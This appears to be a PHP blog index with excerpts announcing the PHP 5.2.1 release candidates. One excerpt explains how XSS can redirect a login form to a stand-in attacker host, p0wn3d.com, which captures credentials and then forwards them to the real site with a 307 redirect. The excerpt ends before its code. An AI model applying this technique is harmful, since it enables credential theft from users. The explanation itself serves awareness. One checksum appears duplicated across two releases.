The 3rd release candidate for PHP 5.2.1 is now available for download. The tarballs can be found here: http://downloads.php.net/ilia/php-5.2.1RC3.tar.bz2 (d3889eda8c3471ce7cf2adb35a4de736) http://downloads.php.net/ilia/php-5.2.1RC3.tar.gz (c5b3e5540d1951d4c4b976b8a39c09ab) and the Win32 binaries will be available in short order. Since the last release, there are over 20 different bug fixes resolving some annoying engine issues such as the tempval leak inside foreach(). We do not anticipate any regressions to be introduced by this RC, but I would still like to ask everyone to take a few minutes and test it against their code base. If you come across any issues please report them at http://bugs.php.net/. Depending on the stability of this release it may either be followed by a final release or another RC, therefor your feedback is critical to determining whether or not the code is stable enough to warrant the 5.2.1 final.

Thanks to Steph's hard work the last few months of weeklies are now available for reading. If you don't have the time or keep an eye on what's going on in the PHP community, especially on the developer mailing lists, weeklies are a quick shortcut to getting yourself up to date.

Every web developer knows how to make a GET redirect, in fact they've probably done it numerous times. However very few people know the same can be done for POST requests, in some instances completely transparently to the user. This by itself make not seem like an issue, but when you combine it with XSS it can be a very powerful to used to scam users. Consider the following scenario. A user goes to a trusted site where XSS had modified the action field of the login POST form, pointing it to http://p0wn3d.com/post.php. When user submits a request it goes to a 3rd party site, which captures the login credentials and then redirects the POST data to the original site. In the end to the user has no clue something sinister had happened because they never see p0wn3d.com. In fact the everything appears to have worked as intended. So how does this work. Ability to redirect POST comes as a courtesy of the little known 307 redirect code. Which in PHP can be forced in the following manner: [php] header("Location:...

The 2nd release candidate for PHP 5.2.1 is now available for download. The tarballs can be found here: http://downloads.php.net/ilia/php-5.2.1RC2.tar.bz2 (cc6024531e3d4058e32cf740e2fe535f) http://downloads.php.net/ilia/php-5.2.1RC2.tar.gz (3f89c31687762a39f1360b380dd315b4) Since the last release over 30 different bug fixes were made and the two pending patches relating to is_numeric_string() optimization and internal heap protection for the Zend Engine allocator were added. Another important change was the fact that the memory limit is now always enabled and to accommodate this change the default limit value was raised to 128 megabytes to avoid script breakage. We do not anticipate any regressions to be introduced by this RC, but I would still like to ask everyone to take a few minutes and test it against their code base. If you come across any issues report them via http://bugs.php.net/ or reply to this blog post.

The first release candidate of PHP 5.2.1 scheduled for late January is now available for download. The tarballs can be found here: php-5.2.1RC1.tar.bz2 (md5sum: cc6024531e3d4058e32cf740e2fe535f) php-5.2.1RC1.tar.gz (md5sum: bafcdff32bcaa564f65293c1c42d117e) For win32 users binaries are available courtesy of Edin php-5.2.1RC1-Win32.zip (md5sum: 00d6833308931fa58581574b8d364e12) php-debug-pack-5.2.1RC1-Win32.zip (md5sum: ac86975945193455658d85921d835e60) This release is primarily aimed at improving the stability of the language and finalization of features introduced in 5.2.0. There are over 70 different bug fixes, a great deal of performance improvements for Windows users, corrections to the memory manager and the improvement in the filter functionality. I'd like to ask everyone to try this release out and let us know if you come across any issues and/or regressions.